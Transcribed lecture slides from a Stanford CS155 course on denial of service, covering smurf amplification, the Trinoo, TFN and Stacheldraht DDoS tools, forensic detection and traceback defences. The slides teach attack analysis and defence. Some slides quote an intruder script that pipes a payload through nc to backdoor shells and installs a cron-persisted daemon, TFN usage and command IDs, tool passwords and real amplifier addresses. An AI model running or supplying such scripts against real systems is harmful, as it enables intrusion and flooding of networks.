denial of service cs155 spring quarter david brumley [email protected]
Post on 21-Dec-2015
221 views
TRANSCRIPT
![Page 2: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/2.jpg)
Overview
• Overview/History of DoS
• Traditional DoS
• DDoS
• Tracking DoS
• Preventative Measures
• Conclusion
![Page 3: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/3.jpg)
Who are we talking about?
Script Kiddies
Exploit Writers
Computer Professionals
R &D Labs/UniversitiesGov’t (NSA)
![Page 4: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/4.jpg)
Example: GRC.COM
![Page 5: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/5.jpg)
Example: GRC.COM
hi, its me, wicked, im the one nailing the server with
udp and icmp packets, nice sisco router, btw im 13, its
a new addition, nothin tracert cant handle, and ur on a
t3.....so up ur connection foo, we will just keep comin
at you, u cant stop us "script kiddies" because we are
better than you, plain and simple.
-------------------
Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….
![Page 6: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/6.jpg)
Classic DoS
• Fork/malloc() bomb• Flooding
– June 1996 1st Adv. on UDP flooding
• Theme: Exploit finite queue or exposed unoptimized interface
• Fix 1: limit interface• Fix 2: optimize interface
![Page 7: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/7.jpg)
Example: SYN Flooding
• Fix 1: Minimal state cache @ A
• Fix 2: SYN Cookies
A
B
Overall Fixing is Non-Trivial Programming
1 2Syn
Ack
SYNACK
![Page 8: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/8.jpg)
Most Prevalent Attacks
• Jolt/jolt2: IP Fragment Reassembly (UDP and TCP)
• Stream/raped: Flood with ACK’s• Trash: IGMP Flooding• Mix UDP/TCP/ICMP flooding• Starting to target routers instead of
hosts
![Page 9: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/9.jpg)
Distributed Attack: Smurf
…10’s to 100’s of hosts..
![Page 10: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/10.jpg)
Amplification Networks
• Netscan.org210.95.3.128 427 (Korea)203.252.30.0 401 (Korea) 203.252.30.255 390 (Korea)210.95.3.255 300 (Korea)130.87.223.255 174 (Japan)206.101.110.127 (US)
• Average amplification: 4
![Page 11: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/11.jpg)
Ping Attack
PING 206.101.110.127: 56 data bytesno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 secno reply from 206.101.110.127 within 1 sec….
![Page 12: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/12.jpg)
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate.64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate.….
![Page 13: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/13.jpg)
Ping Attack
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
….
![Page 14: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/14.jpg)
Ping Attack
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42) : Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time
to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceededpacket seq=13 bounced at 208.155.245.6: Time to live exceeded64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time
to live exceeded
![Page 15: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/15.jpg)
Bad guys point of view
• What to do if smurf no longer works?– Admins could disable broadcast
– Admins could filter from broadcast networks
![Page 16: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/16.jpg)
Distributed DoS
Handlers/Masters
Agents/Daemons
Client
![Page 17: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/17.jpg)
Building DDoS Networks
• Launch exploit
• Log in through back door
• Install daemon
• Install "rootkit" to hide daemon
• Repeat
![Page 18: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/18.jpg)
Result of Exploit
Normal System:sunset:security> telnet elaineTrying 171.64.15.86...Connected to elaine21.stanford.edu.Escape character is '^]'.
UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU)
elaine21.Stanford.EDU login:
Hacked System:sunset:security> telnet jimi-hendrix 1524
Trying 171.65.38.180...Connected to jimi-hendrix.Stanford.EDU (171.65.38.180).Escape character is '^]'.
# ls -altr /; total 1618-r-xr-xr-x 1 root root 1541 Oct 14 1998 .cshrcdrwx------ 2 root root 8192 Apr 14 1999 lost+founddrwxr-xr-x 1 root root 9 Apr 14 1999 bindrwxrwxr-x 2 root sys 512 Apr 14 1999 mnt
![Page 19: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/19.jpg)
Example Intruder Script
• Automated exploit
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
• Trin.shecho "rcp 192.168.0.1:leaf
/usr/sbin/rpc.listen"echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo"echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \*
/usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"
![Page 20: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/20.jpg)
RCP
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: [email protected] as demos: cmd='rcp -f neet.tar'Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: [email protected] as demos: cmd='rcp -f neet.tar'
….
Over 200 hosts compromised!
![Page 21: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/21.jpg)
DDoS Networks
• Trinoo: June/July 1999
• TFN: August/September 1999
• Stacheldraht: Sept/October 1999
• IRC Botnet: More recent
![Page 22: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/22.jpg)
Trinoo Overview
• Communication– Attacker to Masters(s): 27665/tcp – Master to daemon(s): 27444/udp – Daemon to Master(s): 31335/udp
• List of masters hard coded into clients
• UDP Flooder
![Page 23: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/23.jpg)
Trinoo Master
• Daemon list blowfish encrypted• Crypt() password required for startup
# ./master ?? wrongpassword # . . . # ./master ?? gOrave trinoo v1.07d2+f3+c
![Page 24: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/24.jpg)
Trinoo Master Commands
• die
• mtimer (set DoS timer)
• dos IP
• mdie (password required)
• mping - send "PING" command, should get a "PONG"
• mdos
• info - print version information
• msize - Set DoS packet size
• killdead - Solicits "*HELLO*" from clients, else removes entry
• bcast - list hosts
• mstop - attempt to stop DoS. Not implemented :)
![Page 25: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/25.jpg)
Analysis of Handler
# strings - master . . .---vv1.07d2+f3+ctrinoo %sl44adsl <- Cleartext daemon passwordsock0nm1VNMX… <- crypt(g0rave) local master10:09:24Sep 26 1999trinoo %s [%s:%s]bindread*HELLO*ZsoTN.cq4X31 <- Blowfish crypt keyboredNEW Bcast - %s
PONGPONG %d Received from %sWarning: Connection from %sbeUBZbLtK7kkY <- crypt(betalmostdone)trinoo %s..[rpm8d/cb4Sx/] . . .DoS: usage: dos DoS: Packeting %s.aaa %s %smdieErDVt6azHrePE <- crypt(killme) for mdie mdie: Disabling Bcasts.d1e %smdie: password?
![Page 26: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/26.jpg)
Daemon Forensics
• Starting the client sends "*HELLO*" to the master
• Commands of form "arg1 password arg2" - aaa pass IP - DoS IP on
random UDP ports- bbb pass N - Sets time limits - png pass - send a "PONG" to
the master on port 31335/udp - d1e pass - ...
• Note that UNIX strings by default only displays 4 or more ASCII characters!
# strings --bytes=3 ns | tail -15 socket bind recvfrom l44 %s %s %s aIf3YWfOhw.V. aaa bbb shi png PONG d1e rsz xyz *HELLO*
![Page 27: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/27.jpg)
Trinoo LSOF
# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.somaster 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.somaster 1292 root 0u CHR 4,1 2967 /dev/tty1master 1292 root 1u CHR 4,1 2967 /dev/tty1master 1292 root 2u CHR 4,1 2967 /dev/tty1master 1292 root 3u inet 2534 UDP *:31335master 1292 root 4u inet 2535 TCP *:27665 (LISTEN)
![Page 28: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/28.jpg)
Trinoo Forensics
• Master IP addresses visible • Enough strings to recognize daemon/master easily • Listening TCP/UDP ports can be seen with "lsof" • Attacker session not encrypted
![Page 29: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/29.jpg)
Tribal Flood Network
• Communication:– Client to handler: none– Handler <-> agent: ICMP Echo Reply
• DOS Types– SYN– UDP– ICMP– With spoofing capabilities
![Page 30: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/30.jpg)
TFN Handler
-------------------------------------------------------------- [tribe flood network] (c) 1999 by Mixter
usage: ./tfn [ip] [port] contains a list of numerical hosts that are ready to flood -1 for spoofmask type (specify 0-3), -2 for packet size, is 0 for stop/status, 1 for udp, 2 for syn, 3 for
icmp, 4 to bind a rootshell (specify port) 5 to smurf, first ip is target, further ips are
broadcasts[ip] target ip[s], separated by @ if more than one[port] must be given for a syn flood, 0 = RANDOM--------------------------------------------------------------------
![Page 31: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/31.jpg)
TFN Commands
#define ID_ACK 123 /* for replies to the client */
#define ID_SHELL 456 /* to bind a rootshell, optional */
#define ID_PSIZE 789 /* to change size of udp/icmp packets */
#define ID_SWITCH 234 /* to switch spoofing mode */#define ID_STOPIT 567 /* to stop flooding */#define ID_SENDUDP 890 /* to udp flood */#define ID_SENDSYN 345 /* to syn flood */#define ID_SYNPORT 678 /* to set port */#define ID_ICMP 901 /* to icmp flood */#define ID_SMURF 666 /* haps! haps! */
![Page 32: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/32.jpg)
Identifying an Agent
------------------------------------------------------------------------------
td 5931 root cwd DIR 3,5 1024 240721
/usr/lib/libx/...
td 5931 root rtd DIR 3,1 1024 2 /
td 5931 root txt REG 3,5 297508 240734
/usr/lib/libx/.../td
td 5931 root 3u sock 0,0 92814 can't
identify protocol
------------------------------------------------------------------------------
![Page 33: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/33.jpg)
Network Example
# ./tfn iplist 4 12345 [tribe flood network] (c) 1999 by Mixter
# tcpdump -lnx -s 1518 icmptcpdump: listening on eth005:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 64d1 01c8 0000 3132 3334 350005:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00
<- 0x01C8 = 456 base 10“12345” in data portion
<- 0x007b= 123 base 10
![Page 34: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/34.jpg)
Forensics
• Easy to spot in lsof (+)
• ICMP easy to disguise (-)
• ICMP ECHO_REPLY often allowed through firewall (-)
• Attackers session not encrypted
![Page 35: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/35.jpg)
Stacheldraht
• Communication:– Client <-> Handler: 16660/tcp– Handler <-> agent: 65000/tcp,
ICMP_ECHOREPLY – Doesn’t use agent TCP for anything on
versions I’ve seen
• Client/handler traffic blowfish encrypted• UDP/TCP/ICMP flooding w/ spoofing
![Page 36: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/36.jpg)
Stacheldraht Client and Handler
• Client to handler blowfish encrypted w/ password “authentication”
• Handler password “sicken” encrypted with crypt()
• More proactive at identifying live/dead hosts: Similar to distributed network
• Handler limited to 1000 agents
![Page 37: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/37.jpg)
Handler Strings
starting trinoo emulation...removing useful commands.- DONE -available commands in this version are:--------------------------------------------------.mtimer .mudp .micmp .msyn .msort .mping.madd .mlist .msadd .msrem .distro .help.setusize .setisize .mdie .sprange .mstop .killall.showdead .showaliveusage: .distro <user> <server that runs rcp>remember : the distro files need to be executable!that means: chmod +x linux.bin , chmod +x sol.bin ;))sending distro request to all bcasts.... user : %srcp server :
![Page 38: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/38.jpg)
Stacheldraht Agent
• Interesting addition: Upgrade feature via rcp
• Attempts spoofed packet to handler to test if spoofing is possible
• Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”)
• On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”
![Page 39: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/39.jpg)
DoS BotNets
• Scan for vulnerable hosts• Infect• Join IRC channel and wait for
further commands• Generally used for warez
distribution as well• Example: Kaiten
![Page 40: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/40.jpg)
Fighting DDoS:Identify Agents
• Strings of master in daemon
• Finding master is important!
• Dump and log as much as possible
![Page 41: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/41.jpg)
Identifying DDoS Agents
• Counter-espionage/intrusion– Identify intruders signature
– Look for that signature
• RID
![Page 42: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/42.jpg)
RID Examples
start AgentStacheldraht
send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht
start AgentStacheldraht4
send icmp type=0 id=6268 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht4
![Page 43: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/43.jpg)
More RID Examples
start AgentTFN
send icmp type=0 id=789
recv icmp type=0 id=123 nmatch=2
end AgentTFN
start AgentTrinoo
send udp dport=27444 data="png l44adsl"
recv udp data="PONG" nmatch=1
end AgentTrinoo
![Page 44: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/44.jpg)
RID @ Stanford
• start telnetd send tcp dport=7000 data="\r\n" recv tcp data="Ataman Telnetd" nmatch=1end telnetd• ./rid -t 20 -b 255 -n 2 171.64.0.0/16**** 171.64.250.82 infected with telnetd**** 171.64.245.132 infected with telnetd**** 171.64.245.76 infected with telnetd**** 171.64.245.22 infected with telnetd**** 171.64.241.116 infected with telnetd…
• 156 Total!
![Page 45: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/45.jpg)
General DDoS Observations
• Intruders mix encryption mechanisms
• No architecture in security design
• Easily recognizable via strings
![Page 46: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/46.jpg)
Defending against DoS
• Resisting DoS– Filtering– Traffic Shaping– Pure filtering
• Ingress = incoming• Egress = outgoing
• Locating attacker(s)– Logging– Automatic trace back– Packet tagging
![Page 47: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/47.jpg)
Logging
• Audit utilities:– Tcpdump
– Argus
– Cisco Netflow
• Problem: huge data sets
• Asta.com: netflow monitor
![Page 48: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/48.jpg)
Input Logging
1. Log on to nearest router
2. Enable input debugging on router
3. Find upstream4. Recurse
v
a
![Page 49: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/49.jpg)
Controlled Flooding
• Cheswick & Burch
• Idea: Follow the slowest routers
• Problems: obvious
Victim
Attacker
R1 R2
R3
![Page 50: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/50.jpg)
Node Sampling - Savage et alMethod 1
• Use fragment ID• Mark packets with
prob. p of router address
• Issues:– p > 0.5– Long time to infer
path (-)– Multiple attackers at
same dist (-)
R1
R2
R3 R4
R5
R6
Victim
Attacker
p
p(p-1)
p(p-1)2
![Page 51: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/51.jpg)
Method 2: Edge Sampling
• Add 3 fields:– 2 IP addresses
making edge– Distance vector
• Issues:– Space requirements
(-)– p can be arbitrary (+)– Complexity (-)
R1
R2
R3 R4
R5
R6
Victim
Attacker
R2, R6
R3, R2
A, R3
Fmt = Src,Dst
![Page 52: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/52.jpg)
Savage’s Compression Method
• decides to fill in edge ID with prob. P. Set d=0
• Step 2a: next hop b notices d=0, writes b xor a; d++
• Step 2b: next hop notices d !=0, d++;
R1
R2
R3
A
V Get R1’s addr
R2 xor R1 xor R1 = R2
R3 xor R2 xor R2 = R3
![Page 53: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/53.jpg)
Issues with Savage
• Spread edge identification across multiple packets (+)
• Combinatorial complexity during edge identification (-) (Fixed by Dean, Franklin, Stubblefield alg.)
• Reuse of IP fragment field (-)• Does not work on existing hardware
(IRL) (-)
![Page 54: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/54.jpg)
Research Areas
• How vulnerable are P2P protocols?• How can we better identify the
person vs. the program?• Automatic migration during an
attack
![Page 55: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/55.jpg)
Resources
• Packetstormsecurity.com - DDOS Tools
• Theorygroup.com - RID• www.washington.edu/People/dad
David Dittrich’s analysis• www.cert.org/reports/dsit_worksho
p.pdf CERT dealing with DDoS
![Page 56: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/56.jpg)
Questions?
The End
![Page 57: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/57.jpg)
![Page 58: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/58.jpg)
![Page 59: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/59.jpg)
Attacks Happen
![Page 60: Denial of Service CS155 Spring Quarter David Brumley dbrumley@stanford.edu](https://reader036.vdocuments.mx/reader036/viewer/2022062313/56649d595503460f94a39190/html5/thumbnails/60.jpg)
General Direction
• Encrypted traffic
• Real software lifecycles
• Target name servers and other essential network equipment